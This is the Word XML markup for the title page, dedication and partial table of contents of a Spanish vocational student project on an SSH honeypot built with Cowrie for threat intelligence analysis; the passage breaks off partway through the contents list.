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right"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2095500"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095500" cy="523875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2667000" cy="6667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67000" cy="666750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Honeypot SSH con Cowrie:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis de Inteligencia de Amenazas</w:t>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jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proyecto Intermodular ASIR (PIASIR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ciclo Formativo de Grado Superior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Administración de Sistemas Informáticos en Red</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Modalidad Online</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Alumno: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diego Pérez Fonterosa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Centro: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prometeo FP (thePower Education)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Curso: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2025–2026</w:t>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jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diciembre 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId6"/>
          <w:pgSz w:w="11907" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="708" w:footer="708" w:gutter="567"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pP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jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A mi familia, por su apoyo incondicional durante todo el ciclo formativo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A la comunidad de software libre, sin cuya labor este proyecto no sería posible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Índice de Contenidos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Resumen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Justificación del Proyecto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Motivación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Relación con los Módulos Profesionales</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Estado de la Cuestión</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparativa Razonada</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Introducción</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Evolución respecto al Anteproyecto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Funciones Principales</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Requisitos del Sistema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivo General</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivos Específicos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Desglose RFTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción del Sistema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Arquitectura General</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Flujo de Datos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Seguridad y Aislamiento</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Casos de Uso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diseños</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagrama de Arquitectura de Red</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diseño del Flujo de Datos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diseño de Interfaces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagrama de Red</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
